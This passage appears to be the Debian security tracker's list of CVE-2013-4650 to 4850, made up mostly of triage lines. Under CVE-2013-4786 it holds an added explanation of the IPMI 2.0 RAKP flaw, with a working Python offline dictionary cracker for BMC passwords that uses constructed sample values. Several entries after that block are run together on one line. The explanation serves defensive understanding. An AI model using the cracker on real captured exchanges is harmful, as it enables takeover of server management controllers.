	[squeeze] - kfreebsd-8 <not-affected> (FreeBSD NFS server implementation was not supported in squeeze)
CVE-2013-4850 RESERVED
CVE-2013-4849 RESERVED
CVE-2013-4848 (TP-Link TL-WDR4300 version 3.13.31 has multiple CSRF vulnerabilities. ...)
	NOT-FOR-US: TP-Link
CVE-2013-4847 RESERVED
CVE-2013-4846 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2013-4845 (Cross-site scripting (XSS) vulnerability on HP Officejet Pro 8500 (aka ...)
	NOT-FOR-US: HP Officejet Pro
CVE-2013-4844 (Unspecified vulnerability in HP Service Manager 7.11, 9.21, 9.30, 9.31 ...)
	NOT-FOR-US: HP Service Manager and ServiceCenter
CVE-2013-4843 (Unspecified vulnerability in HP Integrated Lights-Out 4 (iLO4) with fi ...)
	NOT-FOR-US: HP iLO
CVE-2013-4842 (Cross-site scripting (XSS) vulnerability in HP Integrated Lights-Out 4 ...)
	NOT-FOR-US: HP iLO
CVE-2013-4841 (Unspecified vulnerability in dbd_manager in LeftHand OS before 11.0 in ...)
	NOT-FOR-US: HP StoreVirtual
CVE-2013-4840 (Unspecified vulnerability in HP and H3C VPN Firewall Module products S ...)
	NOT-FOR-US: HP and H3C VPN Firewall Module
CVE-2013-4839 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4838 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4837 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4836 (Unspecified vulnerability in the GossipService SOAP Request implementa ...)
	NOT-FOR-US: HP Application LifeCycle Management
CVE-2013-4835 (The APISiteScopeImpl SOAP service in HP SiteScope 10.1x and 11.x befor ...)
	NOT-FOR-US: HP SiteScope
CVE-2013-4834 (Unspecified vulnerability in the client component in HP Application Li ...)
	NOT-FOR-US: HP Application LifeCycle Management
CVE-2013-4833 (Cross-site scripting (XSS) vulnerability in HP Service Manager 9.30 th ...)
	NOT-FOR-US: HP
CVE-2013-4832 (HP Service Manager 9.30 through 9.32 allows remote authenticated users ...)
	NOT-FOR-US: HP
CVE-2013-4831 (HP Service Manager 9.30 through 9.32 does not properly manage privileg ...)
	NOT-FOR-US: HP
CVE-2013-4830 (HP Service Manager 9.30 through 9.32 allows remote attackers to execut ...)
	NOT-FOR-US: HP
CVE-2013-4829 (HP LaserJet M4555, M525, and M725; LaserJet flow MFP M525c; LaserJet E ...)
	NOT-FOR-US: HP
CVE-2013-4828 (HP LaserJet M4555, M525, and M725; LaserJet flow MFP M525c; LaserJet E ...)
	NOT-FOR-US: HP
CVE-2013-4827 (SQL injection vulnerability in HP Intelligent Management Center (iMC) ...)
	NOT-FOR-US: HP Intelligent Management Center
CVE-2013-4826 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...)
	NOT-FOR-US: HP Intelligent Management Center
CVE-2013-4825 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...)
	NOT-FOR-US: HP Intelligent Management Center
CVE-2013-4824 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...)
	NOT-FOR-US: HP Intelligent Management Center
CVE-2013-4823 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...)
	NOT-FOR-US: HP Intelligent Management Center
CVE-2013-4822 (Unspecified vulnerability in HP Intelligent Management Center (iMC) an ...)
	NOT-FOR-US: HP Intelligent Management Center
CVE-2013-4821 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2013-4820 (Unspecified vulnerability in HP IceWall SSO 8.0 through 10.0, IceWall ...)
	NOT-FOR-US: HP
CVE-2013-4819 (Unspecified vulnerability in HP IceWall SSO Agent Option 8.0 through 1 ...)
	NOT-FOR-US: HP
CVE-2013-4818 (Unspecified vulnerability in HP IceWall SSO 8.0 through 10.0, IceWall ...)
	NOT-FOR-US: HP
CVE-2013-4817 (Unspecified vulnerability in HP IceWall SSO Agent Option 8.0 through 1 ...)
	NOT-FOR-US: HP
CVE-2013-4816 REJECTED
CVE-2013-4815 (Cross-site scripting (XSS) vulnerability in the web interface in HP Ar ...)
	NOT-FOR-US: HP
CVE-2013-4814 (Cross-site scripting (XSS) vulnerability in HP XP P9000 Command View A ...)
	NOT-FOR-US: HP
CVE-2013-4813 (The Agent (aka AgentController) servlet in HP ProCurve Manager (PCM) 3 ...)
	NOT-FOR-US: HP
CVE-2013-4812 (UpdateCertificatesServlet in the SNAC registration server in HP ProCur ...)
	NOT-FOR-US: HP
CVE-2013-4811 (UpdateDomainControllerServlet in the SNAC registration server in HP Pr ...)
	NOT-FOR-US: HP
CVE-2013-4810 (HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Dr ...)
	NOT-FOR-US: HP
CVE-2013-4809 (Multiple SQL injection vulnerabilities in GetEventsServlet in HP ProCu ...)
	NOT-FOR-US: HP
CVE-2013-4808 (Unspecified vulnerability in HP Service Manager 7.11, 9.21, 9.30, and ...)
	NOT-FOR-US: HP
CVE-2013-4807 (Unspecified vulnerability on the HP LaserJet Pro P1102w, P1606dn, M121 ...)
	NOT-FOR-US: HP
CVE-2013-4806 (The OSPF implementation on HP JD9##A routers; HP J4###A, J484#B, J8### ...)
	NOT-FOR-US: HP routers
CVE-2013-4805 (Unspecified vulnerability in HP Integrated Lights-Out 3 (aka iLO3) fir ...)
	NOT-FOR-US: HP Integrated Lights-Out firmware
CVE-2013-4804 (Unspecified vulnerability in HP Business Process Monitor 9.13.1 patch ...)
	NOT-FOR-US: HP Business Process Monitor
CVE-2013-4803 REJECTED
CVE-2013-4802 (Cross-site scripting (XSS) vulnerability in HP Application Lifecycle M ...)
	NOT-FOR-US: HP
CVE-2013-4801 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4800 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4799 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4798 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4797 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-4796 (ReviewBoard 1.6.17 allows code execution by attaching PHP scripts to r ...)
	- reviewboard (bug #653113)
CVE-2013-4795 (Cross-site scripting (XSS) vulnerability in the Submitters list in Rev ...)
	- reviewboard (bug #653113)
CVE-2013-4794 RESERVED
CVE-2013-4793 (The update function in umbraco.webservices/templates/templateService.c ...)
	NOT-FOR-US: Umbraco
CVE-2013-4792 (PrestaShop before 1.4.11 allows logout CSRF. ...)
	NOT-FOR-US: PrestaShop
CVE-2013-4791 (PrestaShop before 1.4.11 allows Logistician, translators and other low ...)
	NOT-FOR-US: PrestaShop
CVE-2013-4790 (Open-Xchange AppSuite before 7.0.2 rev14, 7.2.0 before rev11, 7.2.1 be ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-4789 (SQL injection vulnerability in modules/rss/rss.php in Cotonti before 0 ...)
	NOT-FOR-US: Cotonti
CVE-2013-4788 (The PTR_MANGLE implementation in the GNU C Library (aka glibc or libc6 ...)
	{DLA-165-1}
	- glibc 2.17-94 (low; bug #717178)
	- eglibc
	[wheezy] - eglibc 2.13-38+deb7u1
CVE-2013-4787 (Android 1.6 Donut through 4.2 Jelly Bean does not properly check crypt ...)
	NOT-FOR-US: Android
CVE-2013-4786 (The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange P ...)
	NOTE: Design flaw in the IPMI 2.0 specification. Any correctly implemented device is vulnerable.
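Why the RAKP exchange is a specification-level flaw rather than an implementation bug: in IPMI 2.0 the BMC answers RAKP Message 1 with RAKP Message 2, which carries an HMAC keyed with the requested user's password over values the remote console chose itself or is told, and it does so before the console has proved anything. Whoever sends Message 1 (or observes both messages) can therefore test password guesses offline with no further traffic to the device. The illustration below is added here and is not Debian tracker, ipmitool or vendor code; the field order follows the RAKP Message 2 definition in the IPMI 2.0 specification with the RAKP-HMAC-SHA1 algorithm, and every session ID, nonce, GUID, user name and password in it is a constructed sample value.

```python
"""Offline password check against a captured IPMI 2.0 RAKP Message 2 (CVE-2013-4786).

Added illustration, not tracker, ipmitool or vendor code. Field layout per the
IPMI 2.0 RAKP Message 2 definition (RAKP-HMAC-SHA1); all sample values constructed.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Requested maximum privilege level byte from RAKP Message 1: Administrator (4)
# with the name-only lookup bit (0x10) set. Constructed sample value.
ROLE_ADMIN_NAME_ONLY = 0x14


def rakp2_auth_code(password: bytes, sid_m: int, sid_c: int, r_m: bytes, r_c: bytes,
                    guid_c: bytes, role_m: int, username: bytes) -> bytes:
    """Key Exchange Authentication Code the BMC places in RAKP Message 2.

    HMAC-SHA1 keyed with K[UID] (the user's password, at most 20 bytes in IPMI 2.0)
    over  SID_M || SID_C || R_M || R_C || GUID_C || Role_M || ULength_M || UName_M.
    Session IDs are 4-byte little-endian; R_M, R_C and GUID_C are 16 bytes each.
    """
    if len(r_m) != 16 or len(r_c) != 16 or len(guid_c) != 16:
        raise ValueError("R_M, R_C and GUID_C must each be 16 bytes")
    if len(username) > 16:
        raise ValueError("IPMI user names are at most 16 bytes")
    data = (struct.pack("<I", sid_m) + struct.pack("<I", sid_c)
            + r_m + r_c + guid_c
            + bytes([role_m & 0xFF, len(username)]) + username)
    return hmac.new(password[:20], data, hashlib.sha1).digest()


def recover_password(auth_code: bytes, sid_m: int, sid_c: int, r_m: bytes, r_c: bytes,
                     guid_c: bytes, role_m: int, username: bytes,
                     candidates: Iterable[bytes]) -> Optional[bytes]:
    """Dictionary check of a captured auth code; returns the matching password or None.

    Everything except the password was either chosen by the remote console (SID_M,
    R_M, Role_M, UName_M) or handed to it in Message 2 (SID_C, R_C, GUID_C), so the
    guessing needs no further interaction with the BMC and cannot be rate-limited.
    """
    for cand in candidates:
        guess = rakp2_auth_code(cand, sid_m, sid_c, r_m, r_c, guid_c, role_m, username)
        if hmac.compare_digest(guess, auth_code):
            return cand
    return None


# Constructed exchange: SID_M, R_M, ROLE_M and USERNAME come from the console's
# RAKP Message 1; SID_C, R_C and GUID_C from the BMC's RAKP Message 2.
SAMPLE = {
    "sid_m": 0xA0A2A3A4,
    "sid_c": 0x02000000,
    "r_m": bytes(range(0x10, 0x20)),
    "r_c": bytes(range(0x20, 0x30)),
    "guid_c": bytes.fromhex("0123456789abcdef0123456789abcdef"),
    "role_m": ROLE_ADMIN_NAME_ONLY,
    "username": b"admin",
}
BMC_PASSWORD = b"changeme"  # constructed; known only to the BMC in a real exchange


def captured_auth_code() -> bytes:
    """Simulate the BMC: the auth code a compliant device returns for SAMPLE."""
    return rakp2_auth_code(BMC_PASSWORD, **SAMPLE)


def demo() -> Optional[bytes]:
    """Recover BMC_PASSWORD from the captured auth code with a small wordlist."""
    wordlist = [b"admin", b"password", b"root", b"changeme"]
    return recover_password(captured_auth_code(), candidates=wordlist, **SAMPLE)


if __name__ == "__main__":
    print("RAKP Message 2 auth code:", captured_auth_code().hex())
    print("recovered password:", demo())
```

Because a correctly implemented BMC must return this value to any client that names a valid user, the fix is not on the client side: Debian's IPMI tools can only warn that the device they are talking to behaves this way, and the practical mitigation is long, random BMC passwords and a management network that untrusted hosts cannot reach.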
NOTE: Contacted relevant maintainers: Since few to no devices do mutual authentication, tools shipped by Debian are generally not affected. At best, the tools can print a warning for vulnerable devices. CVE-2013-4784 (The HP Integrated Lights-Out (iLO) BMC implementation allows remote at ...) NOT-FOR-US: HP IPMI device CVE-2013-4781 (core/getLog.php on the Siemens Enterprise OpenScape Branch appliance a ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4780 (core/getLog.php on the Siemens Enterprise OpenScape Branch appliance a ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4779 (Cross-site scripting (XSS) vulnerability in core/handleTw.php on the S ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4778 (core/getLog.php on the Siemens Enterprise OpenScape Branch appliance a ...) NOT-FOR-US: Siemens Enterprise OpenScape CVE-2013-4777 (A certain configuration of Android 2.3.7 on the Motorola Defy XT phone ...) NOT-FOR-US: Motorola CVE-2013-4776 (NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earli ...) NOT-FOR-US: NETGEAR CVE-2013-4775 (NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earli ...) NOT-FOR-US: NETGEAR CVE-2013-4785 (The web interface on the Dell iDRAC6 with firmware before 1.95 allows ...) NOT-FOR-US: Dell CVE-2013-4783 (The Dell iDRAC6 with firmware 1.x before 1.92 and 2.x and 3.x before 3 ...) NOT-FOR-US: Dell CVE-2013-4782 (The Supermicro BMC implementation allows remote attackers to bypass au ...) NOT-FOR-US: Supermicro CVE-2013-4774 RESERVED CVE-2013-4773 RESERVED CVE-2013-4772 (D-Link DIR-505L SharePort Mobile Companion 1.01 and DIR-826L Wireless ...) NOT-FOR-US: D-Link CVE-2013-4771 RESERVED CVE-2013-4770 (Cross-site scripting (XSS) vulnerability in Eucalyptus Management Cons ...) NOT-FOR-US: Eucalyptus Management Console CVE-2013-4769 (The cloud controller (aka CLC) component in Eucalyptus 3.3.x and 3.4.x ...) 
	- eucalyptus
CVE-2013-4768 (The web services APIs in Eucalyptus 2.0 through 3.4.1 allow remote att ...)
	- eucalyptus
CVE-2013-4767 (Unspecified vulnerability in Eucalyptus before 3.3.2 has unknown impac ...)
	- eucalyptus
CVE-2013-4766 (The gather log service in Eucalyptus before 3.3.1 allows remote attack ...)
	- eucalyptus
CVE-2013-4765
	RESERVED
CVE-2013-4764 (Samsung Galaxy S3/S4 exposes an unprotected component allowing an unpr ...)
	NOT-FOR-US: Samsung
CVE-2013-4763 (Samsung Galaxy S3/S4 exposes an unprotected component allowing arbitra ...)
	NOT-FOR-US: Samsung
CVE-2013-4762 (Puppet Enterprise before 3.0.1 does not sufficiently invalidate a sess ...)
	- puppet (Only affects Puppet Enterprise)
CVE-2013-4761 (Unspecified vulnerability in Puppet 2.7.x before 2.7.23 and 3.2.x befo ...)
	{DSA-2761-1}
	- puppet 3.2.4-1 (low)
	[squeeze] - puppet (non-standard config and attacker requires local access to master)
CVE-2013-4760
	RESERVED
CVE-2013-4759 (Multiple cross-site scripting (XSS) vulnerabilities in the Magnolia Fo ...)
	NOT-FOR-US: Magnolia CMS
CVE-2013-4757
	RESERVED
CVE-2013-4756
	RESERVED
CVE-2013-4758 (Double free vulnerability in the writeDataError function in the Elasti ...)
	- rsyslog (omelasticsearch plugin not enabled; see #715009)
	[squeeze] - rsyslog (omelasticsearch plugin not yet present)
	[wheezy] - rsyslog (omelasticsearch plugin not yet present)
	NOTE: http://bugzilla.adiscon.com/show_bug.cgi?id=461
	NOTE: http://git.adiscon.com/?p=rsyslog.git;a=commitdiff;h=80f88242982c9c6ad6ce8628fc5b94ea74051cf4
CVE-2013-4755
	RESERVED
CVE-2013-4754 (Multiple cross-site scripting (XSS) vulnerabilities in Owl Intranet Kn ...)
	NOT-FOR-US: Owl Intranet Knowledgebase
CVE-2013-4753 (Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.11. ...)
	NOT-FOR-US: Claroline
CVE-2013-4752 (Symfony 2.0.X before 2.0.24, 2.1.X before 2.1.12, 2.2.X before 2.2.5, ...)
	NOT-FOR-US: Symfony HttpFoundation component
CVE-2013-4751 (php-symfony2-Validator has loss of information during serialization ...)
	NOT-FOR-US: Symfony Validator component
CVE-2013-4750
	RESERVED
CVE-2013-4749 (Cross-site scripting (XSS) vulnerability in the UserTask Center, Messa ...)
	NOT-FOR-US: sys_messages TYPO3 extension
CVE-2013-4748 (SQL injection vulnerability in the News system (news) extension before ...)
	NOT-FOR-US: News system TYPO3 extension
CVE-2013-4747 (Cross-site scripting (XSS) vulnerability in the Accessible browse resu ...)
	NOT-FOR-US: Accessible browse results TYPO3 extension
CVE-2013-4746 (Cross-site scripting (XSS) vulnerability in the My quiz and poll (myqu ...)
	NOT-FOR-US: My quiz and poll TYPO3 extension
CVE-2013-4745 (SQL injection vulnerability in the My quiz and poll (myquizpoll) exten ...)
	NOT-FOR-US: My quiz and poll TYPO3 extension
CVE-2013-4744 (Cross-site scripting (XSS) vulnerability in the PHPUnit extension befo ...)
	NOT-FOR-US: PHPUnit TYPO3 extension
CVE-2013-4743 (Static HTTP Server 1.0 has a Local Overflow ...)
	NOT-FOR-US: Static HTTP Server
CVE-2013-4742 (Buffer overflow in NetWin SurgeFTP before 23d2 allows remote attackers ...)
	NOT-FOR-US: SurgeFTP
CVE-2013-4741
	RESERVED
CVE-2013-4740 (goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux ker ...)
	NOT-FOR-US: Goodix gt915 Android touchscreen driver
CVE-2013-4739 (The MSM camera driver for the Linux kernel 3.x, as used in Qualcomm In ...)
	- linux (Android-specific camera drivers)
CVE-2013-4738 (Multiple stack-based buffer overflows in the MSM camera driver for the ...)
	- linux (Android-specific camera drivers)
CVE-2013-4737 (The CONFIG_STRICT_MEMORY_RWX implementation for the Linux kernel 3.x, ...)
	- linux (Affected code not in mainline kernel)
	- linux-2.6 (Affected code not in mainline kernel)
	NOTE: https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=4256415b296348ff16cd17a5b8f8dce4dea37328
CVE-2013-4736 (Multiple integer overflows in the JPEG engine drivers in the MSM camer ...)
	NOTE: https://www.codeaurora.org/projects/security-advisories/integer-overflow-and-signedness-issue-camera-jpeg-engines-cve-2013-4736
	NOT-FOR-US: camera JPEG engines on Android Linux kernels
CVE-2013-4735 (The Digital Alert Systems DASDEC EAS device before 2.0-2 and the Monro ...)
	NOT-FOR-US: Digital Alert Systems and Monroe Electronics
CVE-2013-4734 (dasdec_mkuser on the Digital Alert Systems DASDEC EAS device before 2. ...)
	NOT-FOR-US: Alert Systems and Monroe Electronics
CVE-2013-4733 (The web server on the Digital Alert Systems DASDEC EAS device before 2 ...)
	NOT-FOR-US: Alert Systems and Monroe Electronics
CVE-2013-4732 (** DISPUTED ** The administrative web server on the Digital Alert Syst ...)
	NOT-FOR-US: Alert Systems and Monroe Electronics
CVE-2013-4731 (ajax.cgi in the web interface on the Choice Wireless Green Packet WIXF ...)
	NOT-FOR-US: Choice Wireless Green Packet modem
CVE-2013-4730 (Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to ...)
	NOT-FOR-US: PCMan FTP Server
CVE-2013-4729 (import.php in phpMyAdmin 4.x before 4.0.4.1 does not properly restrict ...)
	- phpmyadmin 4:4.0.4.1-1
	[wheezy] - phpmyadmin (vulnerable code not present)
	[squeeze] - phpmyadmin (vulnerable code not present)
CVE-2013-4728 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...)
	NOT-FOR-US: Acora CMS
CVE-2013-4727 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...)
	NOT-FOR-US: Acora CMS
CVE-2013-4726 (Cross-site request forgery (CSRF) vulnerability in DDSN Interactive cm ...)
	NOT-FOR-US: Acora CMS
CVE-2013-4725 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...)
	NOT-FOR-US: Acora CMS
CVE-2013-4724 (DDSN Interactive cm3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b ...)
	NOT-FOR-US: Acora CMS
CVE-2013-4723 (Open redirect vulnerability in DDSN Interactive cm3 Acora CMS 6.0.6/1a ...)
	NOT-FOR-US: Acora CMS
CVE-2013-4722 (Multiple cross-site scripting (XSS) vulnerabilities in Admin/login/def ...)
	NOT-FOR-US: Acora CMS
CVE-2013-4721 (SQL injection vulnerability in the RSS feed from records extension 1.0 ...)
	NOT-FOR-US: records extension for TYPO3
CVE-2013-4720 (SQL injection vulnerability in the WEC Discussion Forum extension befo ...)
	NOT-FOR-US: WEC Discussion Forum
CVE-2013-4719 (SQL injection vulnerability in the SEO Pack for tt_news extension befo ...)
	NOT-FOR-US: SEO Pack for tt_news extension for TYPO3
CVE-2013-4718 [XSS]
	RESERVED
	NOT-FOR-US: OTRS ITSM
CVE-2013-4717 [SQL injection]
	RESERVED
	{DSA-2733-1}
	- otrs2 3.2.9-1
	NOTE: http://web.archive.org/web/20131023033811/http://www.otrs.com:80/en/open-source/community-news/security-advisories/security-advisory-2013-05/
CVE-2013-4716 (Cross-site scripting (XSS) vulnerability in Tattyan HP TOWN 5_9_3 and ...)
	NOT-FOR-US: Tattyan HP TOWN
CVE-2013-4715 (SQL injection vulnerability in Tiki Wiki CMS Groupware 6 LTS before 6. ...)
	- tikiwiki
CVE-2013-4714 (Cross-site scripting (XSS) vulnerability in Tiki Wiki CMS Groupware 6 ...)
	- tikiwiki
CVE-2013-4713 (Cross-site scripting (XSS) vulnerability in I-O DATA DEVICE RockDisk w ...)
	NOT-FOR-US: I-O DATA DEVICE RockDisk
CVE-2013-4712 (I-O DATA DEVICE HDL-A and HDL2-A devices with firmware 1.07 and earlie ...)
	NOT-FOR-US: I-O DATA DEVICE HDL-A and HDL2-A devices
CVE-2013-4711 (Cross-site scripting (XSS) vulnerability in Accela BizSearch 3.2 on Li ...)
	NOT-FOR-US: Accela Bizsearch
CVE-2013-4710 (Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, ...)
	NOT-FOR-US: Android
CVE-2013-4709 (Buffer overflow in the PPP Access Concentrator (PPPAC) on the SEIL/x86 ...)
	NOT-FOR-US: PPP Access Concentrator
CVE-2013-4708 (The PPP Access Concentrator (PPPAC) in Internet Initiative Japan Inc. ...)
	NOT-FOR-US: Internet Initiative Japan Inc
CVE-2013-4707 (The SSH implementation on D-Link Japan DES-3810 devices with firmware ...)
	NOT-FOR-US: D-Link
CVE-2013-4706 (The SSH implementation on the D-Link Japan DWL-2100AP with firmware be ...)
	NOT-FOR-US: D-Link
CVE-2013-4705 (Cross-site scripting (XSS) vulnerability in Opera before 15.00 allows ...)
	NOT-FOR-US: Opera
CVE-2013-4704 (Cross-site scripting (XSS) vulnerability in ChamaNet ChamaCargo 7.0000 ...)
	NOT-FOR-US: ChamaNet ChamaCargo
CVE-2013-4703 (Cross-site scripting (XSS) vulnerability in the top-page customization ...)
	NOT-FOR-US: Cybozu Office
CVE-2013-4702 (Multiple directory traversal vulnerabilities in the doApiAction functi ...)
	NOT-FOR-US: EC-CUBE
CVE-2013-4701 (Auth/Yadis/XML.php in PHP OpenID Library 2.2.2 and earlier allows remo ...)
	- php-openid 2.2.2-1.2 (low; bug #721221)
	[wheezy] - php-openid (Minor issue)
	[squeeze] - php-openid (Minor issue)
CVE-2013-4700 (The Yahoo! Japan Shopping application 1.4 and earlier for Android does ...)
	NOT-FOR-US: Yahoo shopping app
CVE-2013-4699 (The Yahoo! Japan Yafuoku! application 4.3.0 and earlier for iOS and An ...)
	NOT-FOR-US: Yahoo shopping app
CVE-2013-4698 (Cybozu Mailwise 5.0.4 and 5.0.5 allows remote authenticated users to o ...)
	NOT-FOR-US: Cybozu Mailwise
CVE-2013-4697 (Multiple unspecified vulnerabilities in Hitachi JP1/IT Desktop Managem ...)
	NOT-FOR-US: Hitachi
CVE-2013-4695 (Winamp 5.63: Invalid Pointer Dereference leading to Arbitrary Code Exe ...)
	NOT-FOR-US: Winamp
CVE-2013-4694 (Stack-based buffer overflow in gen_jumpex.dll in Winamp before 5.64 Bu ...)
	NOT-FOR-US: Winamp
CVE-2013-4693 (WordPress Xorbin Digital Flash Clock 1.0 has XSS ...)
	NOT-FOR-US: WordPress Xorbin Digital Flash Clock
CVE-2013-4692 (Xorbin Analog Flash Clock 1.0 extension for Joomia has XSS ...)
	NOT-FOR-US: Xorbin Analog Flash Clock
CVE-2013-4691 (Sencha Labs Connect has XSS with connect.methodOverride() ...)
	NOT-FOR-US: Sencha Labs Connect
CVE-2013-4690 (Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-4689 (J-Web in Juniper Junos before 10.4R13, 11.4 before 11.4R7, 12.1R befor ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-4688 (flowd in Juniper Junos 10.4 before 10.4R11 on SRX devices, when the MS ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-4687 (flowd in Juniper Junos 10.4 before 10.4S14, 11.2 and 11.4 before 11.4R ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-4686 (The kernel in Juniper Junos 10.4 before 10.4R14, 11.4 before 11.4R8, 1 ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-4685 (Buffer overflow in flowd in Juniper Junos 10.4 before 10.4S14, 11.4 be ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-4684 (flowd in Juniper Junos 10.4 before 10.4S14, 11.4 before 11.4R8, 12.1 b ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-4683 (SQL injection vulnerability in the meta_feedit extension 0.1.10 and ea ...)
	NOT-FOR-US: meta_feedit extension for TYPO3
CVE-2013-4682 (SQL injection vulnerability in the Multishop extension before 2.0.39 f ...)
	NOT-FOR-US: Multishop extension for TYPO3
CVE-2013-4681 (SQL injection vulnerability in the sofortueberweisung2commerce extensi ...)
	NOT-FOR-US: sofortueberweisung2commerce extension TYPO3
CVE-2013-4680 (Open redirect vulnerability in Maag Form Captcha extension 2.0.0 and e ...)
	NOT-FOR-US: meta_feedit extension for TYPO3
CVE-2013-4679 (Symantec Workspace Virtualization before 6.x before 6.4.1953.0, when a ...)
	NOT-FOR-US: Symantec Workspace Virtualization
CVE-2013-4678 (The NDMP protocol implementation in Symantec Backup Exec 2010 R3 befor ...)
	NOT-FOR-US: Symantec Backup Exec
CVE-2013-4677 (Symantec Backup Exec 2010 R3 before 2010 R3 SP3 and 2012 before SP2 us ...)
	NOT-FOR-US: Symantec Backup Exec
CVE-2013-4676 (Multiple cross-site scripting (XSS) vulnerabilities in Symantec Backup ...)
	NOT-FOR-US: Symantec Backup Exec
CVE-2013-4675
	RESERVED
CVE-2013-4674 (Cross-site scripting (XSS) vulnerability in the Web Email Protection c ...)
	NOT-FOR-US: Symantec
CVE-2013-4673 (The management console on the Symantec Web Gateway (SWG) appliance bef ...)
	NOT-FOR-US: Symantec
CVE-2013-4672 (The management console on the Symantec Web Gateway (SWG) appliance bef ...)
	NOT-FOR-US: Symantec
CVE-2013-4671 (Cross-site request forgery (CSRF) vulnerability in the management cons ...)
	NOT-FOR-US: Symantec
CVE-2013-4670 (Multiple cross-site scripting (XSS) vulnerabilities in the management ...)
	NOT-FOR-US: Symantec
CVE-2013-4668 (Directory traversal vulnerability in File Roller 3.6.x before 3.6.4, 3 ...)
	- file-roller 3.8.3-1
	[squeeze] - file-roller (Doesn't use libarchive)
	[wheezy] - file-roller (Doesn't use libarchive)
	NOTE: http://www.ocert.org/advisories/ocert-2013-001.html
CVE-2013-4667
	RESERVED
CVE-2013-4666
	RESERVED
CVE-2013-4665 (SPBAS Business Automation Software 2012 has CSRF. ...)
	NOT-FOR-US: SPBAS Business Automation Software
CVE-2013-4664 (SPBAS Business Automation Software 2012 has XSS. ...)
	NOT-FOR-US: SPBAS Business Automation Software
CVE-2013-4663 (git_http_controller.rb in the redmine_git_hosting plugin for Redmine a ...)
	NOT-FOR-US: Redmine plugin redmine_git_hosting
CVE-2013-4662 (The Quick Search API in CiviCRM 4.2.0 through 4.2.9 and 4.3.0 through ...)
	- civicrm (Fixed before initial upload to the archive)
CVE-2013-4661 (CiviCRM 2.0.0 through 4.2.9 and 4.3.0 through 4.3.3 does not properly ...)
	- civicrm (Fixed before initial upload to the archive)
CVE-2013-4660 (The JS-YAML module before 2.0.5 for Node.js parses input without prope ...)
	NOT-FOR-US: js-yaml
CVE-2013-4659 (Buffer overflow in Broadcom ACSD allows remote attackers to execute ar ...)
	NOT-FOR-US: Broadcom ACSD
CVE-2013-4658 (Linksys EA6500 has SMB Symlink Traversal allowing symbolic links to be ...)
	NOT-FOR-US: Linksys
CVE-2013-4657 (Symlink Traversal vulnerability in NETGEAR WNR3500U and WNR3500L due t ...)
	NOT-FOR-US: NETGEAR
CVE-2013-4656 (Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to mi ...)
	NOT-FOR-US: ASUS
CVE-2013-4655 (Symlink Traversal vulnerability in Belkin N900 due to misconfiguration ...)
	NOT-FOR-US: Belkin
CVE-2013-4654 (Symlink Traversal vulnerability in TP-LINK TL-WDR4300 and TL-1043ND.. ...)
	NOT-FOR-US: TP-LINK
CVE-2013-4653 (Multiple cross-site scripting (XSS) vulnerabilities in the signin func ...)
	NOT-FOR-US: Alcatel-Lucent Omnitouch
CVE-2013-4652 (Unspecified vulnerability in the command-line management interface on ...)
	NOT-FOR-US: Siemens
CVE-2013-4651 (Siemens Scalance W7xx devices with firmware before 4.5.4 use the same ...)
	NOT-FOR-US: Siemens
CVE-2013-4650 (MongoDB 2.4.x before 2.4.5 and 2.5.x before 2.5.1 allows remote authen ...)
	- mongodb 1:2.4.5-1 (bug #715007)
	[squeeze] - mongodb (Only affects 2.4.x)
	[wheezy] - mongodb (Only affects 2.4.x)
